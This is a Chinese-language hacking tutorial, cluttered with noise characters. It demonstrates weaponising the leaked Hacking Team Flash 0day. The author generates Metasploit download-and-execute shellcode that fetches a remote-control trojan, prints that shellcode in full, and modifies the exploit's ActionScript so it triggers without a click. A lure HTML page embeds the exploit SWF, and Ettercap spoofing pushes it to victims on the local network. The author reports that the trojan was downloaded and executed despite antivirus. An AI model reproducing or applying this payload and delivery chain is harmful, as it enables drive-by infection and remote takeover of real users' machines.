+ r7 I- ?5 Z8 V' e9 j7 M6 a* L 三、flash 0day之手工代码修改制作下载者实例入侵演示 3 ] }5 b5 F! k) _$ D5 s
% D6 H" H4 G! b3 Q( `
, v2 v& g$ q% @ 利用到的工具: / d* _& a3 h: h2 Q2 v7 k% N+ j$ b
8 z/ P/ @ N( }- P' [" ?( H
+ b8 V( X- q+ E( V
Msf
5 J6 b; Q3 r' k0 n; C" w6 t 6 E# |! W8 q0 o3 Q$ ~2 X f! f9 m
6 y+ k+ v6 F* u- t9 T1 ^% S0 \
Ettercap
4 a& U T4 v: \0 b
! n: ^, k, i4 E/ g- Q" ?/ @" }5 ~8 \+ v& Z
Adobe Flash CS6 , B- ~; a' `2 ]" y% ~
0 s, f* r9 {& R6 Y5 Z% @
) n5 V' b7 e) X" e9 ^" e# M" e Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
2 \: L6 J/ ^6 u2 d- q6 B
( b8 L, V* m5 T' a- h
3 B! o7 U) i, _: o% R' y 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
4 l) a* Y3 S3 d! s$ P( v M3 E! f + e' }$ U( b" w! z$ t/ }/ b; w
* w0 \3 a$ ]2 X. \% h0 t4 j
如图:
. W, T2 u$ u5 w+ ?4 y" T
$ G2 r3 |2 j, B2 N* ]; z+ Y5 Z4 t0 w9 m) A* x
9 \$ @8 J8 v! i' l c* J
2 A/ q% j& \' O8 R! S
. c( m3 X9 S$ w1 ]4 @
. k! M* m- `! D1 Q$ U' M
! A: m9 l* t/ V# V6 F& L2 e% L1 k( U ]
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
. Z2 d& x8 g" i& D4 |& G' x
3 a+ Z1 j$ Z* [. A
. B; d8 X0 s" `# j7 } , ?" Z& c, i% `
- S5 C+ ]4 t4 a0 \& k
/ n9 l3 V4 m8 N2 U, I( n' w( K 1 B8 V3 d4 \; w$ ~
9 O" i* _1 o1 m% U q
0 ~5 C# g' i! i# D0 f8 G* A
然后执行generate -t dword生成shellcode,如下: $ R X4 U8 i& e9 u9 [5 m6 v7 Z
9 t1 Y- X. X! s# y$ D. [% F, ~3 b6 m8 J+ ~% T: W
. P: b* s( z7 C% _
3 P- E. `# I% Q6 T0 z( m. U0 c2 |% v+ ?9 b0 `2 M# n; ^
复制代码到文本下便于我们一会编辑flash exp,如下: " h4 k1 G. |7 m! x1 R7 b9 g2 E# b
' A# k9 h9 C' [4 z" j! [( j" s2 A( k) a9 d
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
V! O+ L0 v0 @0 r* D5 }+ x 0 g& H: h7 W* q& T* p g% ^
/ o6 v2 H2 t, Y- R- K1 j4 K5 n 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
7 O! A. v" l3 F% Z* J
; ^$ P! S% h" i% _, x, f" x4 x/ v. p* b
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
/ q# h* j$ j3 T+ V" l9 C m3 N
9 ?! F, q( _, |! ?
' [0 f) k8 p6 d8 a 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
+ ~6 ~" V/ o9 z% M1 q% @$ h$ p
9 }9 Y1 u; m! i& Q/ g2 B( G6 X" A* l
! u2 W! L" d: J. |4 M6 _ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 7 j- G9 I3 k6 t7 q
+ k8 Z5 k U) O7 Y: }. [- i
8 z- ]& X, @, ~, A
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
7 z( l' O6 c! Y1 i
. p& Y" u, z% ^1 ]
% ]* I4 _3 R/ ~% n& m 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
( W$ T( k) G9 @2 s* ^% n
: s- F4 A4 h) ~' W2 p
& o- Y+ f1 X- |# r1 o 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 9 P; E/ V! e6 k& U# _
' ]1 @. q( Q, [" D0 c( f1 R
+ k3 r. S( Q) @6 @' e" k' K+ b 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ( f: C" u7 q8 q* v) @
3 S5 \* ?. m$ P# b; y2 l
. g2 O# ^" Y* o, |2 ^. D
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
( A/ a7 H; F: n) O+ e
+ P8 x/ x$ o0 | h5 N
0 |( C7 A1 e2 n u7 b" U1 Y/ H 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
1 R2 j% ]6 T l
$ T u5 S, F0 N6 @0 ?
/ Y! {/ @* b5 H8 i8 P f5 w 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, $ ]0 [ p, a# C' [5 U
" G# K4 i2 p. F0 \. p0 P# r
( Y% \# i( q- B5 h
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
1 `6 i: r7 _! ~% g4 T$ X
8 B7 k8 k0 K' J7 v5 ?! a& |& P- J
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ) s; F( W5 q9 K
4 j* ^, |: j5 T6 h
9 A* [: S1 Z- p5 y4 Y
+ t3 H8 E9 R& B7 g
9 A. h- z2 T8 a- Q' ^& h: f4 M: o% v6 t9 U
4 v P# g" E/ `
8 B8 f) l6 x* `/ M- h
( a; `+ Y" L5 U 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
5 m/ b/ ~3 }" J# `! C* ~, v 8 y. m L; D; Z. b T7 V
0 D. O- t, B# Y; K$ B* C
$ s2 [) _7 [) X0 A, S) h - @5 W/ s! O \
& O8 L0 R* F* z% L) m3 \ 先修改ShellWin32.as,部分源代码如图: 6 \% o3 k& _, F( G
' ~9 k) J/ v D: c5 W+ _. {* Q' |7 p4 J
! u' w# x: C$ a' J6 y4 A2 ^
! S# U5 W% s% {, H+ @
% `2 [$ ]; I' R1 Q/ j 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: $ h0 Q" D9 Q7 w r4 R
& R( _) T6 R7 @! H
% F/ M8 g+ _# H4 v3 v
# {# i9 K4 G) K. x/ f8 s- P% D( F
- y1 ~2 _4 K3 R; D
3 Y' Y/ _( j' T2 D' } 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
: O/ m' S( d6 F; N& e. I" m. O; a! N
- L. s: [$ B* c
- Q( P$ R6 h# _6 C5 D' K
. @+ y" @$ W$ Y4 I, R; ?$ `0 a3 c7 ` 3 e% d" [! ^/ q2 y& P" i* s
1 W! U8 K. A& h7 r+ {3 B 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
1 A: H2 g2 P( I) e+ N ( F$ d ]( s3 w, h0 `7 t
, ~! P: |. d% m, h
5 s( U/ @8 m+ _6 e3 ^' f
. s: n w5 b5 J, V! |+ {
2 U8 O5 u4 S W
8 p# Q' K- {1 W. B: ^8 }
% ?9 K6 [# U% X* ?3 x( W
4 O! ? m) B$ ?4 {
9 a8 u1 J4 a! w# h* b( {
6 L) ~$ R* \$ ?
+ Z6 u( D0 j+ B$ r 然后点保存,下面我们来编译一下,打开
7 j- e& S- s- k: o3 M# L9 _( m ) q n2 K9 z+ a/ u& N0 o
: X: i- m$ e: ]
exp1.fla然后点文件-发布,看看编译没错误 1 ^8 _0 d6 i$ f6 w3 I1 P+ _! l d
( o: m' Q1 U) a4 M7 V1 `& y: r1 D0 @+ u7 i7 o; @) e5 H
]) P( b$ D" @
! x& A+ w0 Z6 K: a
( t4 r% N5 M+ T9 f. V 7 h/ B! H# e+ g
' K9 C- k& }% l/ q; E
' h2 ^: w3 ? L4 O9 c6 i6 [ ?* P% A 1 f8 V7 g' s2 G+ _9 R( D: s, k1 [
; s; }' |( m6 w( t- f( K. Q
7 d e7 f6 O! c9 z7 I) j
) U1 E2 n4 ~8 f* h$ `
! b& _5 Y% h! x; J" v+ C# ?, F% ]/ }& _! E8 t
然后我们把生成的 ( p" G3 t# l+ `$ t* @( s
" x% x/ s4 K0 z# s$ ^1 q
! F; ?4 ]' C, S1 i exp1.swf丢到kailinux 的/var/www/html下: # W5 c4 P; ~' h7 I2 M
- O4 I0 Z- B- W, i. @' D* L
6 c, L" D' @0 u* b 然后把这段代码好好编辑一下
4 I1 w: N: G: Z4 o & }8 D5 K* p- c4 D/ m+ \ O
8 T8 _# y4 G: u1 E' J1 p
6 K: {# V! b. c& B+ f9 @
8 h4 }# x# \+ v: ], U9 `! g% o4 U$ \9 {! c+ h3 Y% E
9 p- p4 x$ _3 j# {9 i/ | ( u' O7 z4 f3 e
3 @4 K6 |+ d1 `: ^ u+ H: L X2 w0 }: c
; ]2 J" G4 |- F N' c' y* I; z9 ~1 m' ^+ E2 C, \ P
; U2 ~, g8 M& l, @. c6 v! R " p" G9 W! k4 [4 H7 f. q3 \( H- d
- ?) C5 R4 W7 c: _! \ 0 H! B- @0 _2 @( J
/ ^" W* k! U! }6 X) R- M; J/ Z
: H8 c, D& c P! s7 |! C 9 W1 P4 l E( b* L
' P; ]- u( M0 H8 s8 N9 ?7 {! O
* W) u6 w6 K3 y* O4 B1 S' J3 A
<!DOCTYPE html>
- _" V% b7 c, r) z! F* \+ q
% ^5 {8 I3 L! m5 {0 \
% O& w1 q5 L# C, U <html>
4 d# X, P7 f, f, j8 }0 E8 J5 z 1 ^* G0 K2 G0 h3 B3 H# v
. ]7 G: |: ^& d) I+ C6 e
<head> 5 C& d4 x* g+ k. J% f1 y* A
$ j% m; _4 o m; k2 `+ ?! T: I8 z1 j; C0 @* q
<meta http-equiv="Content-Type" content="text/html; $ K' \3 e, v( g" I
/ r" g7 J# R' ^! n% S. L+ m
5 B. J& P& M7 W" ]/ Z6 Y& d6 Y
charset=utf-8"/>
2 o; g5 I O$ C1 c4 H7 W$ _# v) Q. ^ ' f! [( R+ E) Z) u( w9 I/ ]
: Q7 v* v$ P) P9 }) X( F </head>
/ A# |, e( `4 D3 ]
8 \% z+ A: x- b6 b6 W, w
% M. u% Z( d' X! Y1 J <body>
+ q, v$ D, y+ U- ]6 K8 X
6 i* R) j# _4 G/ |& v) q* G; \9 V7 W* }. t( o
<h2> Please wait, the requested page is loading...</h2>
$ ~* G! r" ~" H8 F i % b+ @: N1 w5 W4 p
7 Q" G: }% s* {, H. [7 @
<br>
9 a/ M) r) t8 R! ~1 l
' ^8 q5 L9 ]* k$ I" J, G; C" f7 c R5 F; i! M
<OBJECT & Q3 P! V. q2 t3 W& }
/ B. ]7 D8 r2 n; V* o. o
: y# S+ B6 S0 P$ g classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie $ Z4 U9 m: [& z* R9 d! k$ T( A
m/ c0 E, S, K! i5 J
$ m& G, k- z9 A; p3 A
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> - B% e k2 u F+ n
6 u* @3 v/ s! O& x6 z
8 l* a: g+ Q& A
</body> " T$ D1 e2 a0 V$ k
( G* W! f. K |/ Y2 e9 u
' [" x! T4 d: {; d( g5 y" S <script> . A3 }) I9 W+ g# p5 I% j4 V
: }5 a% u% i& C
* ^+ [" Y. Z$ K0 d9 V4 J setTimeout(function () { 9 ?( c! n* J h% k0 I
; X/ {; d: _7 R9 V: p- L
: W4 S' w9 l3 G' [& o$ \
3 r5 o( S" O; c7 }/ S 7 H8 ` z: c' ~+ l, f
0 A5 O" r, V2 P6 `$ \9 V: O
window.location.reload();
7 @7 b0 d, Q' J% [; F " t; [2 }) A4 B1 {
/ Q8 [ R- ]. R$ E5 r0 a
}, 10000);
6 i+ n$ R7 A0 W+ M2 R; p5 B
( [1 ?% f1 V* N2 i. V! q' U8 q# E- T5 t
* Q T$ o/ V- {; v" P0 Y( n& k
- I! v C1 L1 V; ~
2 W! M% s0 @1 u6 [ </script> P* d5 @. ?" k* W' ^) h! v o
8 |. h# W0 R K& x7 r
" S2 o3 I% J' F: S& S$ G4 R3 w </html>
6 t4 Z2 P1 z4 b4 U* e & u5 Q8 _0 ?6 C; _
: E; B# X, R P7 ^# D3 Q
4 k" {# Z; ?& o( B
$ h$ B8 f1 I9 Q4 N' s7 O) @
6 I* \, Z2 o$ `( _, \0 u4 z 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ! ]2 B7 _$ ^2 z) ?2 m
8 g8 z* Y7 Z4 v8 r. ^& o2 J* d
1 V0 s9 J, a( m7 P- u Z, u D
. {8 ]* y# ~& x* C( z
8 O8 n5 H* [6 C( O
, u2 p3 w0 t; K' C5 E
6 B: P2 g; a" ?: p- m! a
' q. e) v4 I& P' T7 o& p6 W- ~9 B6 \2 Q4 f+ X4 M C
$ V. v' I N# M; ~* E8 A* c8 S0 D8 M
4 }( R1 Q: X% J3 B" J/ k1 ]& c1 M, K2 X: o
2 P5 \- l8 C, x) ~- e7 C
- {+ o$ }; J1 B6 L5 ?& C! v( u$ U A& i# h1 x4 P8 _( [
+ I! D! k7 X6 o0 z/ M 1 N9 V7 l3 E; b9 s6 J
$ e( \1 [* w" X9 C6 y& [, u( K0 L 下面我们用ettercap欺骗如图:
! T% y3 r2 |9 L# a) o! M ( ^: \+ ^5 J7 Z) c- q/ ?
! N, C r! ^* w: J: Y
( n7 O* ]5 \: \7 S
7 ~* j+ [# d! w9 M
e- Q5 |" C4 _6 p
% c* I% m! w1 ^2 `- Q ! A, y$ l `" p; \& }1 Q
0 u( m( Z$ n; U) E1 w1 T
下面我们随便访问个网站看看: 7 S" u( N+ }8 u# ]! r
! @8 X8 s1 Z. X8 \4 ]9 P z0 l. h$ p0 G5 s& t5 S8 s
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: / Y' M( Y8 |0 R3 m! i
. Q7 a2 o5 q- g1 W
8 A+ f" |( v( @9 U : w. q# N2 a( X8 O% ?% f7 U" ]0 d2 f) y
! W/ R: G& g. B9 x, c/ v/ h9 D
; P9 U( @; Z3 j* x
我们看另一台, 4 |8 v1 ~9 e n6 p5 ^
/ i7 \# Y8 ~$ U# c& Y8 d4 F: ]- H' V# {/ G" H# F* H/ s
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
+ L' o* @6 h1 u7 T |